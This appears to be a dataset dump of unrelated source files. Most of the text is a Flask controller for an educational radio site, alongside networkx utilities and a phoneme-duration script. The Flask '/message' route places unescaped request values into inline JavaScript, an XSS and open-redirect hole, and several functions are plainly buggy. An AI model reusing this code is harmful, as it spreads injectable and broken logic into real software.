restaurant_train1.info()
restaurant_train1.drop(['Id','Open Date','City','revenue'], axis=1, inplace=True)
X_train = restaurant_train1
y_train = restaurant_train['revenue']
dt_estimator = tree.DecisionTreeRegressor()
dt_grid = {'max_depth':[3,4,5]}
dt_grid_estimator = model_selection.GridSearchCV(dt_estimator, dt_grid, scoring='mean_squared_error', cv=10, n_jobs=5)
def rmse(y_true, y_pred):
return math.sqrt(metrics.mean_squared_error(y_true, y_pred))
dt_grid_estimator = model_selection.GridSearchCV(dt_estimator, dt_grid, scoring=metrics.make_scorer(rmse), cv=10, n_jobs=5)
#build model using entire train data
dt_grid_estimator.fit(X_train,y_train)
dt_grid_estimator.grid_scores_
dt_grid_estimator.best_estimator_
dot_data = io.StringIO()
tree.export_graphviz(dt_grid_estimator.best_estimator_, out_file = dot_data, feature_names = X_train.columns)
graph = pydot.graph_from_dot_data(dot_data.getvalue())[0]
graph.write_pdf("dt1.pdf")
|
[
"info@algorithmica.co.in"
] |
info@algorithmica.co.in
|
774b5d122b0934195ecea5ea6da154d54920ab87
|
73d61eec8ff9a7408ef1c040f5a6ee229753da6e
|
/Flask/NationalEducationRadio/NationalEducationRadio/controllers/radio.py
|
5bf37430b5688fcceac3aecddaf4186b697233b3
|
[
"MIT"
] |
permissive
|
Jessieluu/WIRL_national_education_radio
|
dfff69fb266252103171af34e24fc6a1ac558045
|
edb8b63c25bc7bd5a9a7d074173f02913971f8a7
|
refs/heads/master
| 2020-03-10T17:12:03.485819
| 2018-07-13T08:44:15
| 2018-07-13T08:44:15
| 129,494,085
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 19,705
|
py
|
# -*- coding: utf-8 -*-
import time
import sys
import math
import random
import json
from io import StringIO
from datetime import datetime, timedelta
from flask import Flask, redirect, url_for, render_template, session, flash, request, jsonify, Response
from flask.ext.login import current_user, login_required, logout_user, login_user
from sqlalchemy import desc
from sqlalchemy import exists
import ast
from NationalEducationRadio.service import get_blueprint
from NationalEducationRadio.service import db
from NationalEducationRadio.models.db.User import User, AccessLevel
from NationalEducationRadio.models.form.LoginForm import LoginForm
from NationalEducationRadio.models.form.RegisterForm import RegisterForm
from NationalEducationRadio.models.units.tools import password_encryption, required_to_flash, audio_upload, \
parse_question_csv, get_solr_data
from NationalEducationRadio.models.db.Channel import Channel
from NationalEducationRadio.models.db.Audio import Audio
from NationalEducationRadio.models.db.Record import Record
from NationalEducationRadio.models.db.HotPlay import HotPlay
from NationalEducationRadio.models.db.OperationLog import OperationLog
from NationalEducationRadio.models.db.PlayLog import PlayLog
from NationalEducationRadio.models.db.HotPlay import HotPlay
from NationalEducationRadio.models.db.OperationLog import OperationLog
from NationalEducationRadio.models.db.TimeHotPlay import TimeHotPlay
from NationalEducationRadio.models.db.SearchLog import SearchLog
from NationalEducationRadio.models.db.SearchSelectedLog import SearchSelectedLog
from NationalEducationRadio.models.db.KeywordsTable import KeywordsTable
from NationalEducationRadio.models.recommend.batch import count_user_time_hot_play, similar_audio, hot_play, op_habit, timehotplay, keywordprocessing
from NationalEducationRadio.controllers.recommend import recommend_audios
from collections import OrderedDict
import jieba
import jieba.analyse
import requests
import numpy as np
import os
from hanziconv import HanziConv
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.feature_extraction.text import CountVectorizer
from collections import Set
from flask_login import UserMixin, LoginManager, login_required, current_user, login_user, logout_user
root = get_blueprint('root')
radio = get_blueprint('radio')
@root.route('/', methods=['GET', ])
def root_index():
return redirect(url_for('radio.index'))
# @radio.route('/test', methods=['GET', ])
# def knowledge_index():
# print("test")
# return render_template('radio/knowledge.html')
@radio.route('/', methods=['GET', ])
@login_required
def index():
"""
首頁抓第一筆資訊並跳轉到那頁
:return: 第一筆節目音檔的頁面
"""
ado = Audio.query.first()
return redirect(url_for('radio.show', channel_id=ado.audio_channel, audio_id=ado.audio_id))
@radio.app_errorhandler(404)
def handle_404(err):
return request.path
@radio.route('/json/<int:channel_id>/<int:audio_id>', methods=['GET', ])
@login_required
def showJson(channel_id, audio_id):
"""
將該音檔所帶有的資訊與題目轉換成 JSON,讓 React 使用
:return: JSON 格式資訊
"""
channel = Channel.query.filter_by(channel_id=channel_id).first()
audios = Audio.query.filter_by(channel=channel).all()
audio = Audio.query.filter_by(audio_id=audio_id).first()
summary = get_solr_data(audio.audio_id)
if audio is None or channel is None or audio.channel != channel:
return "Nothing"
"""
計算前後,有更好的方法嗎?
"""
aI = 0
now = None
pre = None
nxt = None
for x in audios:
if aI > 0 and now is None:
pre = audios[aI - 1].audio_id
if now is not None:
nxt = audios[aI].audio_id
break
if x == audio:
now = aI
aI += 1
a = [1, 2, 3, 4, 5, 6]
json_content = {}
json_content['channel_id'] = channel_id
json_content['channel_name'] = channel.channel_name
json_content['audio_id'] = audio_id
json_content['audio_name'] = audio.audio_name
json_content['audio'] = url_for('static', filename="upload/" + audio.audio_file)
json_content['title'] = audio.audio_name
json_content['depiction'] = audio.channel.channel_memo
json_content['logo'] = url_for('static', filename="images/covers/" + str(random.choice(a)) + ".jpg")
json_content['forward'] = url_for('radio.show', channel_id=channel_id, audio_id=nxt) if nxt is not None else "#"
json_content['backward'] = url_for('radio.show', channel_id=channel_id, audio_id=pre) if pre is not None else "#"
json_content['questions'] = json.loads(audio.audio_question)
json_content['audio_summary'] = summary
keyword = []
if audio.keyword is not None:
keyword = audio.keyword.split(",")
json_content['keywords'] = keyword
return json.dumps(json_content, ensure_ascii=False)
@radio.route('/login', methods=['GET', 'POST'])
def login():
def login_redirect():
return redirect(url_for('radio.index'))
if current_user.is_anonymous is not True:
return login_redirect()
form = LoginForm()
form2 = RegisterForm()
if form.validate_on_submit():
# new_user = User(name=form2.name.data,
# account=form2.account.data,
# password=password_encryption(form2.password.data),
# level=0)
# db.session.add(new_user)
# db.session.commit()
admin_user = User.query.filter_by(account=form.account.data,
password=password_encryption(form.password.data)).first()
print(admin_user)
if admin_user is not None:
session['level'] = admin_user.level
login_user(admin_user)
return login_redirect()
else:
flash('帳號或密碼錯誤')
required_to_flash(form)
return render_template('radio/login.html', current_user=current_user, form=form, reg=form2)
@radio.route('/error')
def accountExist():
return "exist"
@radio.route('/message')
def message():
return '''
<script>
alert("{message}");
window.location="{location}";
</script>'''.format(
message=str(request.args['message']),
location=request.args['location']
)
@radio.route('/register', methods=['POST'])
def register():
form = RegisterForm()
if form.validate_on_submit():
(exist,), = db.session.query(exists().where(User.account == form.account.data)) # check account existance
if (exist):
return redirect(url_for('radio.message', message='帳號重複', location='login'))
new_user = User(name=form.name.data,
account=form.account.data,
password=password_encryption(form.password.data),
level=0)
db.session.add(new_user)
db.session.commit()
return redirect(url_for('radio.message', message='註冊成功,請重新登入', location='login'))
# return render_template('radio/register.html', current_user=current_user, form=form)
@radio.route('/logout', methods=['GET', 'POST'])
def logout():
logout_user()
return redirect(url_for('radio.login'))
@radio.route('/dosomething', methods=['POST', ])
@login_required
def dosomething():
audio = Audio.query.filter_by(audio_id=request.json['audio_id']).first()
user = User.query.filter_by(id=current_user.id).first()
record = Record(audio=audio, user=user, record_data=json.dumps(request.json['questions']))
return "success"
@radio.route('/record', methods=['GET', 'POST'])
def record():
# audios = Audio.query.filter_by(channel=channel).all()
records = Record.query.filter_by(user_id=current_user.id).order_by(desc(Record.record_id)).all()
return render_template('radio/record.html', current_user=current_user, records=records)
@radio.route('/view/<record_id>', methods=['GET', 'POST'])
def view(record_id):
record = Record.query.filter_by(user_id=current_user.id, record_id=record_id).first()
audio = record.audio
questions = json.load(StringIO(audio.audio_question))
for question in questions:
question['user_answer'] = 0
question['answer'] = 0
recordData = json.load(StringIO(record.record_data))
for data in recordData:
for question in questions:
if data['id'] == question['id']:
question['user_answer'] = data['user_answer']
question['answer'] = data['answer'][0]
break
return render_template('radio/view.html', questions=questions)
@radio.route('/<int:channel_id>/<int:audio_id>/', methods=['GET', ])
@login_required
def show(channel_id, audio_id):
nextChannel = Channel.query.join(Audio, Audio.audio_channel == Channel.channel_id).filter(
Channel.channel_id > channel_id).first()
if nextChannel is not None:
nextAudio = Audio.query.filter_by(audio_channel=nextChannel.channel_id).first()
else:
nextAudio = None
audio = Audio.query.filter_by(audio_id=audio_id).first()
audios = Audio.query.filter_by(audio_channel=channel_id).order_by(Audio.audio_id).all()
success, keywords, summary = get_solr_data(audio.audio_id)
if success is False:
summary = audio.channel.channel_memo
else:
keywords = keywords.split(" , ")
recommend_audio = recommend_audios(current_user.id, audio_id)
print(recommend_audio)
return render_template('radio/front_index.html', targetAudio=audio, audios=audios, recommend_audio = recommend_audio, nextChannel=nextChannel,
nextAudio=nextAudio,
success=success, summary=summary, keywords=keywords, page="show",
json_file=url_for('radio.showJson', channel_id=channel_id, audio_id=audio_id))
@radio.route('/newIndex', methods=['GET', ])
@login_required
def newIndex():
"""
首頁抓第一筆資訊並跳轉到那頁
:return: 第一筆節目音檔的頁面
"""
ado = Audio.query.group_by(Audio.audio_channel).first()
return redirect(url_for('radio.show', channel_id=ado.audio_channel, audio_id=ado.audio_id))
@radio.route('/front_record', methods=['GET', ])
def front_record():
records = Record.query.filter_by(user_id=current_user.id).order_by(desc(Record.record_id)).all()
ids = list()
for record in records:
ids.append(record.audio.audio_channel)
channels = Channel.query.filter(Channel.channel_id.in_(set(ids))).all()
session1 = []
session2 = []
for channel in channels:
session1.append({
'channel_id': channel.channel_id,
'name': channel.channel_name,
'count': ids.count(channel.channel_id)
})
for record in records:
audio = record.audio
if audio.audio_channel == channel.channel_id:
questions = json.load(StringIO(audio.audio_question))
for question in questions:
question['user_answer'] = 0
question['answer'] = 0
recordData = json.load(StringIO(record.record_data))
for data in recordData:
for question in questions:
if data['id'] == question['id']:
question['user_answer'] = data['user_answer']
question['answer'] = data['answer'][0]
break
session2.append((record, questions))
return render_template('radio/front_record.html', session1=session1, session2=session2, page="record")
# ***
@radio.route('/get_playlog', methods=['POST',])
@login_required
def get_playlog():
ts = int(time.time())
Pl = PlayLog(
audio = request.json['audio_id'],
user = current_user.id,
star_time = ts)
db.session.add(Pl)
db.session.commit()
playlog_id = PlayLog.query.filter_by(user = current_user.id).order_by(desc(PlayLog.play_log_id)).first()
json_content = {}
json_content['playlog_id'] = playlog_id.play_log_id
return json.dumps(json_content, ensure_ascii=False)
# ***
@radio.route('/add_playlog_end_time', methods=['POST',])
@login_required
def add_playlog_end_time():
ts = int(time.time())
#print(ts)
#print(request.json['playLogId'])
playlog = PlayLog.query.filter_by(play_log_id = request.json['playLogId']).first()
playlog.end_time = ts
db.session.commit()
return "success"
# ***
@radio.route('/add_oplog', methods=['POST',])
@login_required
def add_oplog():
ts = int(time.time())
Op = OperationLog(
play_log = request.json['play_log'],
operation_code = request.json['operation_code'],
operation_value = request.json['operation_value'],
timestamp = ts)
db.session.add(Op)
db.session.commit()
return "success"
@radio.route('/get_new_audio_id', methods=['POST',])
@login_required
def get_new_audio_id():
ret = ""
audio = Audio.query.with_entities(Audio.audio_id).all()
if request.json['button_type'] == "forward" :
for i in range(len(audio)):
if audio[i][0] == request.json['audio_id'] and i+1 <= len(audio):
ret = str(audio[i+1][0])
elif request.json['button_type'] == "backward" :
for i in (range(len(audio)), -1, -1):
if audio[i][0] == request.json['audio_id'] and i-1 >= 0:
ret = str(audio[i-1][0])
else:
pass
json_content = {}
json_content['audio_id'] = request.json['audio_id']
###############
return json.dumps(json_content, ensure_ascii=False)
@radio.route('/daily_batch/', methods=['GET', ])
def daily_batch():
#每日例行批次計算
print("****** Start processing Daily_batch ! ******\n", file=sys.stderr)
#全系統
keywordprocessing()
similar_audio()
hot_play()
timehotplay()
#全部使用者
users = User.query.all()
print("****** Start processing count_user_time_hot_play Module ! ******\n", file=sys.stderr)
for user in users:
count_user_time_hot_play(user.id)
print("****** Processing count_user_time_hot_play Module done ! ******\n", file=sys.stderr)
# print("****** Start processing op_habit ! ******\n", file=sys.stderr)
for user in users:
op_habit(user.id)
# print("****** Processing op_habit done! ******\n", file=sys.stderr)
print("****** Processing Daily_batch done! ******\n", file=sys.stderr)
return "Processing Daily_batch done!"
@radio.route('/API_FB_login', methods=['POST'])
def API_FB_login():
userID = request.json['userID']
accessToken = request.json['accessToken']
userName = request.json['userName']
userEmail = request.json['userEmail']
print(userID, accessToken, userName, userEmail)
FBuserID_Exist = User.query.filter_by(FBuserID=userID).first()
if FBuserID_Exist == None:
newAccount = User(name=userName,
account=userEmail,
password=None,
level=123,
FBuserID=userID,
FBAccessToken=accessToken)
db.session.add(newAccount)
login_user(newAccount)
else:
FBuserID_Exist.FBAccessToken = accessToken
db.session.add(FBuserID_Exist)
login_user(FBuserID_Exist)
db.session.commit()
return '11'
@radio.route('/API_GOOGLE_login', methods=['POST'])
def API_GOOGLE_login():
userID = request.json['userID']
userName = request.json['userName']
userEmail = request.json['userEmail']
print(userID, userName, userEmail)
GOOGLEuserID_Exist = User.query.filter_by(GOOGLEuserID=userID).first()
if GOOGLEuserID_Exist == None:
newAccount = User(name=userName,
account=userEmail,
password=None,
level=123,
GOOGLEuserID=userID)
db.session.add(newAccount)
login_user(newAccount)
else:
db.session.add(GOOGLEuserID_Exist)
login_user(GOOGLEuserID_Exist)
db.session.commit()
return '11'
# need to change keyword search
@radio.route('/knowledge', methods=['GET', ])
def knowledge():
finalResult = []
# get search keyword
keyword = str(request.args.get('search'))
#keyword = "廣播"
# scrawler setting
# url = "http://140.124.183.5:8983/solr/EBCStation/select?indent=on&q=*:*&rows=999&wt=json"
# url = "http://nermoocs.org/solr/EBCStation/select?indent=on&q=*:*&rows=999&wt=json"
url = "http://127.0.0.1/solr/EBCStation/select?indent=on&q=*:*&rows=999&wt=json"
article = requests.get(url).json()
# db length
articleLen = article['response']['numFound']
# save audio_id
audioID = set()
# filter Audio ID
for a in range(articleLen):
if len(audioID) is 100:
break
if keyword in article['response']['docs'][a]['content']:
audioID.add(article['response']['docs'][a]['audio_id'])
print(audioID)
# query Audio Info from db
for i in audioID:
# save one audio format result
result = {}
audioInfo = Audio.query.filter_by(audio_id=i).first()
if audioInfo is None:
continue
result["id"] = i
# processing keyword string format
keywordList = []
if audioInfo.keyword is not None:
for k in HanziConv.toTraditional(audioInfo.keyword).split(","):
if k is not '':
keywordList.append(k)
# save json format parameters
result["keyWord"] = keywordList
result["type"] = audioInfo.audio_channel
result["title"] = audioInfo.audio_name
result["text"] = ""
# get similar audio ID
similarAudioData = Audio.query.filter_by(audio_id=i).first().similar_audio
# save ID
similarAudioID = []
# str covert to dict
if similarAudioData is not None:
listSimilarAudio = ast.literal_eval(similarAudioData)
# save audio all similarAudioID
for l in listSimilarAudio:
for k in l.keys():
similarAudioID.append(int(k))
result["links"] = similarAudioID
finalResult.append(result)
print(finalResult)
resp = Response(response=json.dumps(finalResult, ensure_ascii=False),
status=200,
mimetype="application/json")
return resp
# caption get
@radio.route('/captionGet', methods=['POST', ])
def captionGet():
# scrawler setting
url = "http://127.0.0.1/solr/EBCStationCaption/select?indent=on&q=*:*&rows=9999&wt=json"
# url = "http://nermoocs.org/solr/EBCStationCaption/select?indent=on&q=*:*&rows=9999&wt=json"
caption = requests.get(url).json()
# db length
captionLen = caption['response']['numFound']
audio_id = request.json['audio_id']
print(audio_id)
for l in range(captionLen):
captionList = []
if caption['response']['docs'][l]['audio_id'] == audio_id:
for i in caption['response']['docs'][l]['caption'].split("\n"):
content = i.split(",")
if len(content) < 2:
continue
captionList.append({
'start_time': content[0],
'end_time': content[1],
'caption': content[2]
})
break
print(captionList)
return json.dumps(captionList, ensure_ascii=False)
|
[
"lujessie950410@gmail.com"
] |
lujessie950410@gmail.com
|
4bf8468109c4dc890a374ce4940ebd3f6e8b9575
|
5e07d7e4d2ee7b470f05c4dfca30b105519e7dfb
|
/api_app/urls.py
|
646821ff26d126477669f1e96ac3c71db4fbe4bc
|
[] |
no_license
|
waltermaina/dht11_esp8266_django
|
921f229ebc76510bbc4c403852d182731841b885
|
888d8d9c82255ee8e6eaecce418f5c9fe4d996fc
|
refs/heads/master
| 2022-08-29T22:14:06.885360
| 2021-05-01T13:56:16
| 2021-05-01T13:56:16
| 235,754,246
| 0
| 0
| null | 2022-08-11T14:57:36
| 2020-01-23T08:36:27
|
Python
|
UTF-8
|
Python
| false
| false
| 400
|
py
|
# api_app/urls.py
from django.urls import include, path
from . import views
urlpatterns = [
path('v1/', views.ListData.as_view()),
path('v1/<str:pk>/', views.DataDetail.as_view()),
path('v2/', views.NewListData.as_view()),
path('v2/last/', views.LastRecordData.as_view()),
path('v2/<str:pk>/', views.NewDataDetail.as_view()),
path('rest-auth/', include('rest_auth.urls')),
]
|
[
"waltermaina@yahoo.com"
] |
waltermaina@yahoo.com
|
4c821cab3daa611fa7e3c9f00eb41fbaa0d93c51
|
5b507113111016534efb347104ef5aa98e594471
|
/constants.py
|
694decc4e9b29b7ac5341a4fa714b89b0717be63
|
[] |
no_license
|
Enlight-UW/enlight-backend
|
36ec941c45fde611b18b52f87054de964622db5e
|
a5b74f61d44a1492df87d7c19cf48ef4a017350b
|
refs/heads/master
| 2021-05-30T04:41:11.369788
| 2015-04-28T01:14:21
| 2015-04-28T01:14:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 65
|
py
|
VERSION = "0.0.1"
DB_FILENAME = "maquina.sqlite"
NUM_VALVES = 24
|
[
"alex@dividebyxero.com"
] |
alex@dividebyxero.com
|
ec33460c3849409bf61d09e4e2d82342a10baa68
|
d5292505eb7b8b93eca743eb187a04ea58d6b6a3
|
/venv/Lib/site-packages/networkx/utils/random_sequence.py
|
b8e3531f92047ece6fc5dc565eaeafde9f0c3d6b
|
[
"Unlicense"
] |
permissive
|
waleko/facerecognition
|
9b017b14e0a943cd09844247d67e92f7b6d658fa
|
ea13b121d0b86646571f3a875c614d6bb4038f6a
|
refs/heads/exp
| 2021-06-03T10:57:55.577962
| 2018-09-04T19:45:18
| 2018-09-04T19:45:18
| 131,740,335
| 5
| 1
|
Unlicense
| 2020-01-19T10:45:25
| 2018-05-01T17:10:42
|
Python
|
UTF-8
|
Python
| false
| false
| 4,196
|
py
|
# Copyright (C) 2004-2018 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
#
# Authors: Aric Hagberg (hagberg@lanl.gov)
# Dan Schult (dschult@colgate.edu)
# Ben Edwards (bedwards@cs.unm.edu)
"""
Utilities for generating random numbers, random sequences, and
random selections.
"""
import random
import sys
import networkx as nx
# The same helpers for choosing random sequences from distributions
# uses Python's random module
# https://docs.python.org/2/library/random.html
def powerlaw_sequence(n, exponent=2.0):
"""
Return sample sequence of length n from a power law distribution.
"""
return [random.paretovariate(exponent - 1) for i in range(n)]
def zipf_rv(alpha, xmin=1, seed=None):
r"""Return a random value chosen from the Zipf distribution.
The return value is an integer drawn from the probability distribution
.. math::
p(x)=\frac{x^{-\alpha}}{\zeta(\alpha, x_{\min})},
where $\zeta(\alpha, x_{\min})$ is the Hurwitz zeta function.
Parameters
----------
alpha : float
Exponent value of the distribution
xmin : int
Minimum value
seed : int
Seed value for random number generator
Returns
-------
x : int
Random value from Zipf distribution
Raises
------
ValueError:
If xmin < 1 or
If alpha <= 1
Notes
-----
The rejection algorithm generates random values for a the power-law
distribution in uniformly bounded expected time dependent on
parameters. See [1]_ for details on its operation.
Examples
--------
>>> nx.zipf_rv(alpha=2, xmin=3, seed=42) # doctest: +SKIP
References
----------
.. [1] Luc Devroye, Non-Uniform Random Variate Generation,
Springer-Verlag, New York, 1986.
"""
if xmin < 1:
raise ValueError("xmin < 1")
if alpha <= 1:
raise ValueError("a <= 1.0")
if seed is not None:
random.seed(seed)
a1 = alpha - 1.0
b = 2**a1
while True:
u = 1.0 - random.random() # u in (0,1]
v = random.random() # v in [0,1)
x = int(xmin * u**-(1.0 / a1))
t = (1.0 + (1.0 / x))**a1
if v * x * (t - 1.0) / (b - 1.0) <= t / b:
break
return x
def cumulative_distribution(distribution):
"""Return normalized cumulative distribution from discrete distribution."""
cdf = [0.0]
psum = float(sum(distribution))
for i in range(0, len(distribution)):
cdf.append(cdf[i] + distribution[i] / psum)
return cdf
def discrete_sequence(n, distribution=None, cdistribution=None):
"""
Return sample sequence of length n from a given discrete distribution
or discrete cumulative distribution.
One of the following must be specified.
distribution = histogram of values, will be normalized
cdistribution = normalized discrete cumulative distribution
"""
import bisect
if cdistribution is not None:
cdf = cdistribution
elif distribution is not None:
cdf = cumulative_distribution(distribution)
else:
raise nx.NetworkXError(
"discrete_sequence: distribution or cdistribution missing")
# get a uniform random number
inputseq = [random.random() for i in range(n)]
# choose from CDF
seq = [bisect.bisect_left(cdf, s) - 1 for s in inputseq]
return seq
def random_weighted_sample(mapping, k):
"""Return k items without replacement from a weighted sample.
The input is a dictionary of items with weights as values.
"""
if k > len(mapping):
raise ValueError("sample larger than population")
sample = set()
while len(sample) < k:
sample.add(weighted_choice(mapping))
return list(sample)
def weighted_choice(mapping):
"""Return a single element from a weighted sample.
The input is a dictionary of items with weights as values.
"""
# use roulette method
rnd = random.random() * sum(mapping.values())
for k, w in mapping.items():
rnd -= w
if rnd < 0:
return k
|
[
"a.kovrigin0@gmail.com"
] |
a.kovrigin0@gmail.com
|
2c1c34c5bcbf233aab6409d4ed753dce47d172ce
|
4383c8eccb56707d843bc048768a5265bb04f072
|
/py_files_old/pd_LSR.py
|
9b6e990dba92ad7a2ddf2c3cec956cd0e52f673b
|
[] |
no_license
|
alexalias/alexarbeit
|
395f2aac5c3cd718b4ad16dd8004acc84e7ed54f
|
2ba0b3771e00d1b9e4466ee7db853a009264e061
|
refs/heads/master
| 2020-12-31T05:24:36.445994
| 2017-05-22T20:27:38
| 2017-05-22T20:27:38
| 81,091,971
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,547
|
py
|
import os
import glob
import re
import numpy as np
from collections import defaultdict
import speech_rate
# Returns a dictionary of phoneme occurences (keys) in the training data and their durations (values), and LSR (values)
# Looks like {a: [1452, 0.8, 799, 0.5], b : [655, 0.5, 799, 0.45]...}
def read_trainig_files():
training_dict = defaultdict(list)
os.chdir("C:/Users/alexutza_a/Abschlussarbeit/DB_Verbmobil/Evaluation/Training")
#Iterate over the training files
for file in glob.glob("*.par"):
work_file = open(file)
for line in work_file:
if re.match("MAU", line):
training_dict[line.split()[4]].append(int(line.split()[2]))
word_duration, phon_count, syl_count = speech_rate.word_duration(file, int(line.split()[3]))
training_dict[line.split()[4]].append((word_duration/0.0000625)/phon_count)
#training_dict[line.split()[4]].append(speech_rate.local_speech_rate(file, int(line.split()[3])))
work_file.close()
# Remove breaks from the data
x = training_dict.pop("<p:>")
return training_dict
# A dictionary giving the values of Mean and SD in a list for each encountered phoneme.
def phone_stats(training_dict):
stat_dict = defaultdict(list)
for phoneme in training_dict.keys():
stat_dict[phoneme].append(int(round(np.mean(training_dict[phoneme][::2]), 0)))
stat_dict[phoneme].append(int(round(np.std(training_dict[phoneme][::2]), 0)))
return stat_dict
# Not used
def mean_of_means(stat_dict):
m1 = 0
for p in stat_dict:
m1 += stat_dict[p][0]
mom = m1 / len(stat_dict.keys())
return mom
# Returns a list of phoneme occuring in the test files, followed by their respective durations
# Looks like: ["a", 583, 0.5, "b", 12, 0.78, "a", 489, 0.12, ...]
def read_testfiles():
compare_list = []
os.chdir("C:/Users/alexutza_a/Abschlussarbeit/DB_Verbmobil/Evaluation/Test")
#Iterate over the test files
for file in glob.glob("*.par"):
work_file = open(file)
for line in work_file:
if re.match("MAU", line):
compare_list.append(str(line.split()[4]))
compare_list.append(int(line.split()[2]))
word_duration, phon_count, syl_count = speech_rate.word_duration(file, int(line.split()[3]))
compare_list.append(round((word_duration/0.0000625)/phon_count, 1)) # speech rate as word_duration / # phonemes
#compare_list.append(speech_rate.local_speech_rate(file, int(line.split()[3])))
work_file.close()
#print(compare_list)
# Remove breaks from the data
# Get list of indexes for occurences of <p:>
pause_index = [i for i, val in enumerate(compare_list) if val == "<p:>"]
#print(len(pause_index))
pause_dur = [i + 1 for i in pause_index]
pause_stat = [j + 1 for j in pause_dur]
p_l = [x for y in zip (pause_index, pause_dur) for x in y]
p_list = p_l + pause_stat
#print(len(p_list))
actual_list = []
#print(compare_list)
ind = 0
# Copy list to new list, without pauses
for el in compare_list:
if ind not in p_list:
actual_list.append(el)
ind += 1
return actual_list
# Returns a dictionary of the official phoneme means for VM1+2
def official_stats():
o_dict = defaultdict(list)
#omedian_dict = defaultdict(float)
official_file = open("C:/Users/alexutza_a/Abschlussarbeit/DB_Verbmobil/Evaluation/Training/Basic_german_phone_list.txt")
for line in official_file:
if len(line.split()[0]) < 3:
o_dict[line.split()[0]].append(int(round((float(line.split()[6])/0.0000625), 0)))
o_dict[line.split()[0]].append(int(round((float(line.split()[7])/0.0000625), 0)))
#omedian_dict[line.split()[0]] = int(round((float(line.split()[9])/0.0000625), 0))
#print(o_dict)
return o_dict#, omedian_dict
# Quote of phoneme mean duration being greater than the local speech rate (as word duration / no. of phonemes)
def test_mean(training_dict, stat_dict):
test_dict = defaultdict(float)
for elem in training_dict.keys():
rate_list = training_dict[elem][1::2]
test_mean_list = [ 1 for x in rate_list if x <= stat_dict[elem][0]]
test_dict[elem] = len(test_mean_list)/len(rate_list)
return test_dict
# Create a list of durations and a list of word durations from the training data
def dur_vs_rate(training_dict):
duration_list = []
rate_list = []
for el in training_dict.keys():
duration_list += training_dict[el][::2]
rate_list += training_dict[el][1::2]
return duration_list, rate_list
#duration_list, rate_list = dur_vs_rate(read_trainig_files())
# Returns a list with predicted durations for the phonemes of the test set.
# Predicted durations come from the observed durations in the training set (mean and SD), and
# from the official mean statistics of Verbmobil, for phonemes, which don't occur in the training set.
# @param testfile_list: the list returned by read_testfiles()
# Looks like: ["a", 583, 0.5, "b", 12, 0.78, "a", 489, 0.12, ...]
# @param stat_dict: dictionary giving the mean and the SD for each phoneme
# NO: the full dictionary built from the training data
# NO: Looks like {a: [1452, 0.8, 799, 0.5], b : [655, 0.5, 799, 0.45]...}
def create_prediction_list(testfile_list, stat_dict):
phone_list = testfile_list[::3]
vowels = ["a:", "e:", "E:", "i:", "o:", "u:", "y:", "2:", "a~:", "a", "e", "E", "i", "o", "u", "y", "2", "a~", "@", "9"]
#print(phone_list)
#mini = min(testfile_list[1::3])
#lsr_list = testfile_list[2::3]
prediction_list = []
#off_dict = official_stats()
#print(len(lsr_list))
#print(len(phone_list))
#print(phone_list)
#prediction_list = [ training_dict.get(el, o_dict[el]) for el in phone_list ]
#prediction_list = [ training_dict.get(el, omedian_dict[el]) for el in phone_list ]
i = 0
for phone in phone_list:
#print(i)
#print(phone)
# prediction_list = testfile_list[2::3]
if phone in stat_dict.keys():
# prediction_list.append(mini + (stat_dict[phone][0]-mini)*lsr_list[i]) # Klatt
# prediction_list.append(mini + stat_dict[phone][1]*lsr_list[i]) # Klatt mit SD statt Differenz
# prediction_list.append(mini + stat_dict[phone][1]/3*lsr_list[i]) # Klatt mit SD / 3
# prediction_list.append(stat_dict[phone][0]) # just mean per phoneme
if lsr_list[i] <= 0.45:
prediction_list.append(stat_dict[phone][0] - stat_dict[phone][1]/3) # mean +/- sigma/3
elif lsr_list[i] >= 0.65:
prediction_list.append(stat_dict[phone][0] + stat_dict[phone][1]/3)
# else:
# prediction_list.append(stat_dict[phone][0])
# if phone in vowels: # split for using SR instead of mean based on relation mean - SR
# if test_mean(read_trainig_files(), stat_dict)[phone] >= 0.8:
# prediction_list.append(testfile_list[i*3+2] + ((stat_dict[phone][1]/3)))
# elif test_mean(read_trainig_files(), stat_dict)[phone] <= 0.45:
# prediction_list.append(testfile_list[i*3+2] - ((stat_dict[phone][1]/3)))
# else:
# prediction_list.append(testfile_list[i*3+2])
# else:
# prediction_list.append(stat_dict[phone][0])
# else:
# prediction_list.append(mini + (off_dict[phone][0]-mini)*lsr_list[i]) # Klatt mit offiziellen Werten
# prediction_list.append(mini + off_dict[phone][1]*lsr_list[i]) # Klatt mit SD statt Differenz
# prediction_list.append(mini + off_dict[phone][1]/3*lsr_list[i]) # # Klatt mit SD / 3
# prediction_list.append(off_dict[phone][0]) # mean / phoneme (aus offiziellen Werten)
#
# if lsr_list[i] <= 0.45:
# prediction_list.append(off_dict[phone][0] - (off_dict[phone][1]/3))
# elif lsr_list[i] >= 0.65:
# prediction_list.append(off_dict[phone][0] + (off_dict[phone][1]/3))
# else:
# prediction_list.append(off_dict[phone][0])
i += 1
return prediction_list
|
[
"12krah@cloak.mafiasi.de"
] |
12krah@cloak.mafiasi.de
|
ee74da074651806b44affe44236d16dd446b60fb
|
404d32aa69b477af742aa6af5498d6568791e6e5
|
/Week 14/Ex5.py
|
56b488a4b48620462e70c00e04c2d05cd87a7b25
|
[] |
no_license
|
Koemsak/Week14_Python
|
214922dc1df8e80da5ff1158ceb6722f06f690a2
|
3c65a3fe25d71104647e1a2a4f7a2d9c147226d2
|
refs/heads/main
| 2023-01-04T04:03:41.681676
| 2020-11-10T02:01:39
| 2020-11-10T02:01:39
| 311,516,684
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 223
|
py
|
array = eval(input())
nbRows = len(array)
nbCol = len(array[0])
result = []
for index in range(nbCol):
sum = 0
for row in range(nbRows):
sum += array[row][index]
result.append(sum)
print(result)
|
[
"noreply@github.com"
] |
Koemsak.noreply@github.com
|
32865d3fdead909edcc3650051f3912fc2e64079
|
1dd4e2905085ace304446f5fc3ccade67f8b6e26
|
/spider/gzip_deflate/__init__.py
|
b03fb41ce64b77186364474b35223ce484f2a69c
|
[] |
no_license
|
ZhouBoXiao/SpiderDemo
|
f76b192f7dd5323de379a7e43f3fcf392a5cb086
|
